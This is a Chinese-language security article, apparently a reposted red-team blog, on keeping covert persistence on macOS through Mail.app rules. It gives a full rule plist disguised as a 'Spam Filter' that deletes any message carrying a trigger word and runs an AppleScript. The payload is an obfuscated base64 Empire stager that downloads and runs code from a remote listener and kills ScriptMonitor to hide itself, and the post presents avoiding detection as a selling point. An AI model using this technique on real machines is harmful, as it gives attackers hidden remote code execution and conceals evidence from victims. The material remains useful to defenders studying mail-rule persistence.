在这篇文章中，我们将会介绍如何在 OS X上通过使用 Mail.app 实现持久化驻留。我的灵感来自于一款类似的被设计用来同Microsoft Outlook一起运行的工具。我的第一个意外发现来自于MWR InfoSecurity的这篇文章[1]，另外一个来自于Silent Break Security 的这篇博文[2]。虽然Mail.app中的规则复制不能跨越目录域，这也正是Xrulez和Ruler中令人惊叹的规则之一，但是它比起其他的持久化方法来讲，确实有一些较为明显的优势。
        在被远程激活之前，它都不会显示网络签名
        它不会被任何检测持久化的工具检测到（比如KnockKnock）。

        目标网络7天/24小时处于监测状态的情况并不罕见。大多数持久化方法要求恶意软件不断地向命令控制服务器发出信号。这样通常会出现一个独特的，可以被精明的分析师发现的网络签名。一个具有安全意识的用户或组织，可以列举出恶意软件常用的保证持久性的区域。典型的有LaunchDeamons，Cron Jobs，Kernel Extensions。

KnockKnock正在系统中运行

虽然这种技术会在主机上留下文件，但是不会被常见的安全工具监测到，这是一个加分项。
要通过标准方式来创建一条mail规则，我们需要点击Mail->Preferences->Rules->Add Rule。
为了做渗透测试，假设我们不能在GUI内部进行交互，因此我们寻找一种通过shell执行这种操作的办法。
邮件规则存储在：
/Users/$USER/Library/Mail/$VERSION/MailData/SyncedRules.plist
        $USER代表用户主目录的名字，$VERSION代表操作系统版本。MacOS Sierra (10.12)是V4，OS X El Capitan (10.11) 是V3，OS X Lion (10.7) 到 OS X Yosemite (10.10)是V2。
        如果用户正在同步iCloud，那么邮件规则将会被另一个文件覆盖，这个文件位于：/Users/$USER/Library/Mobile Documents/com~apple~mail/Data/$VERSION/MailData/SyncedRules.plist
这个文件将会优先覆盖/Library/Mail/中的文件，因此，你应该将你的规则添加到这个文件。
当iCloud自动同步发生时，如果默认位置正在被使用，那么为了使应用程序重新加载新规则，Mail.app将会被退回（重启）。
    还有一个重要警告，那就是除非由存在于相同目录的RulesActiveState
.plist指定，否则邮件规则将不会处于活动状态。
        以下是我们试着做的可接受的规则的剖析：
                        <dict>
                        <key>AllCriteriaMustBeSatisfied</key>
                        <string>NO</string>
                        <key>AppleScript</key>
                        <string>EVIL.scpt</string>
                        <key>AutoResponseType</key>
                        <integer>0</integer>
                        <key>Criteria</key>
                        <array>
                        <dict>
                        <key>CriterionUniqueId</key>
                        <string>9709BE75-9606-D470-4F04-0A884724105A</string>
                        <key>Expression</key>
                        <string>TriggerWord</string>
                        <key>Header</key>
                        <string>Subject</string>
                        </dict>
                        </array>
                        <key>Deletes</key>
                        <string>YES</string>
                        <key>HighlightTextUsingColor</key>
                        <string>NO</string>
                        <key>MarkFlagged</key>
                        <string>NO</string>
                        <key>MarkRead</key>
                        <string>NO</string>
                        <key>NotifyUser</key>
                        <string>NO</string>
                        <key>RuleId</key>
                        <string>0A08B01B-4DAF-FA3A-E81D-CBA86A0E7C84</string>
                        <key>RuleName</key>
                        <string>Spam Filter</string>
                        <key>SendNotification</key>
                        <string>NO</string>
                        <key>ShouldCopyMessage</key>
                        <string>NO</string>
                        <key>ShouldTransferMessage</key>
                        <string>NO</string>
                        <key>TimeStamp</key>
                        <integer>147762204</integer>
                        <key>Version</key>
                        <integer>1</integer>
                        </dict>

值得注意的地方有：
        AppleScript — 这标识着AppleScript应该运行，并且这个字符串标识着playload。
        CriterionUniqueId和RuleId —Rule的唯一标识。这条规则的RuleID需要在RulesActiveState.plist激活。
        Expression — 这是我们的规则匹配时需要查找的字符串。
        RuleName — 这是个规则的名字。为了避免被监测，它应该被命名为一些看起来比较无害的名字。
        Deletes — 当条件匹配时，它会删除邮件。

为了激活规则，需要在RulesActiveState.plist中包含RuleID，如下：
                <key>0A08B01B-4DAF-FA3A-E81D-CBA86A0E7C84</key>
<true/>

现在已经覆盖了规则创建了，是时候谈谈playload了。
Playloads由AppleScript创建。

以下是一个playload示例：
do shell script "echo \"import sys,base64;exec(base64.b64decode('aW1wb3J0IHN5cztvPV9faW1wb3J0X18oezI6J3VybGxpYjInLDM6J3VybGxpYi5yZXF1ZXN0J31bc3lzLnZlcnNpb25faW5mb1swXV0sZnJvbWxpc3Q9WydidWlsZF9vcGVuZXInXSkuYnVpbGRfb3BlbmVyKCk7VUE9J01vemlsbGEvNS4wIChXaW5kb3dzIE5UIDYuMTsgV09XNjQ7IFRyaWRlbnQvNy4wOyBydjoxMS4wKSBsaWtlIEdlY2tvJztzZXJ2ZXI9J2h0dHA6Ly8xMC4xMC4xMC4xMDo4MDgwJzt0PScvYWRtaW4vZ2V0LnBocCc7by5hZGRoZWFkZXJzPVsoJ1VzZXItQWdlbnQnLFVBKSwgKCJDb29raWUiLCAic2Vzc2lvbj1ZODROTmF3cHd1VHN4ZEF0VVRsa0ZvWGc3b2c9IildO2E9by5vcGVuKHNlcnZlcit0KS5yZWFkKCk7SVY9YVswOjRdO2RhdGE9YVs0Ol07a2V5PUlWKyd2JnRSXnJhNEZiM0hrWTkhXUp5LVdocWYlPDB4TjhLXyc7UyxqLG91dD1yYW5nZSgyNTYpLDAsW10NCmZvciBpIGluIHJhbmdlKDI1Nik6DQogICAgaj0oaitTW2ldK29yZChrZXlbaSVsZW4oa2V5KV0pKSUyNTYNCiAgICBTW2ldLFNbal09U1tqXSxTW2ldDQppPWo9MA0KZm9yIGNoYXIgaW4gZGF0YToNCiAgICBpPShpKzEpJTI1Ng0KICAgIGo9KGorU1tpXSklMjU2DQogICAgU1tpXSxTW2pdPVNbal0sU1tpXQ0KICAgIG91dC5hcHBlbmQoY2hyKG9yZChjaGFyKV5TWyhTW2ldK1Nbal0pJTI1Nl0pKQ0KZXhlYygnJy5qb2luKG91dCkp'));\"
| python & kill `ps -ax | grep ScriptMonitor |grep -v grep |  awk '{print $1}'`"

AppleScript可以轻松地发送命令，就像你在终端中使用”do shell script[3] “
一样。第二部分是典型的Empire[4] stager。在&符号之后的附加命令是为了隐藏AppleScript。如果没有它，则不仅活动监视器中能够看到AppleScript，而且在MenuBar上还会有活动图标。看起来就像一个旋转的齿轮。


我创建了一个Empire模块[5]，你可以使用Empire2.0自动完成这些。我最初的概念证明[6]脚本也可以通过手动运行存在，你可以在其中指定你自己的参数以及payload。我强烈建议给Empire模块一个齿轮旋转。

在获得初始会话之后，使用Empire模块的步骤：
        使用模块persistence/osx/mail（或者你自己的模块放置的位置）
        指定Listener，Trigger Word，和RuleName
        执行

当你想要在一段时间之后执行playload时，你所需要做的就是：
        使你的Empire服务开启侦听。
        向目标发送邮件，在主题行中指定触发词。

电子邮件将会被删除，因此永远不会传递到收件箱，python将会产生一个程序，这个程序会从你的Empire服务器拉下stager。

1. https://labs.mwrinfosecurity.com/blog/malicous-outlook-rules/
2. https://silentbreaksecurity.com/malicious-outlook-rules/
3. https://developer.apple.com/library/content/technotes/tn2065/_index.html
4. https://github.com/adaptivethreat/Empire
5. https://github.com/n00py/pOSt-eX/blob/master/empire_modules/mail.py
6. https://github.com/n00py/pOSt-eX/blob/master/mail.py

[招生]科锐逆向工程师培训(2024年11月15日实地，远程教学同时开班, 第51期)

上传的附件：

• 0.jpg （45.90kb，2次下载）
• 1.jpg （24.43kb，1次下载）
• 3.png （26.37kb，1次下载）
• 4.png （10.42kb，1次下载）
• 5.png （5.96kb，1次下载）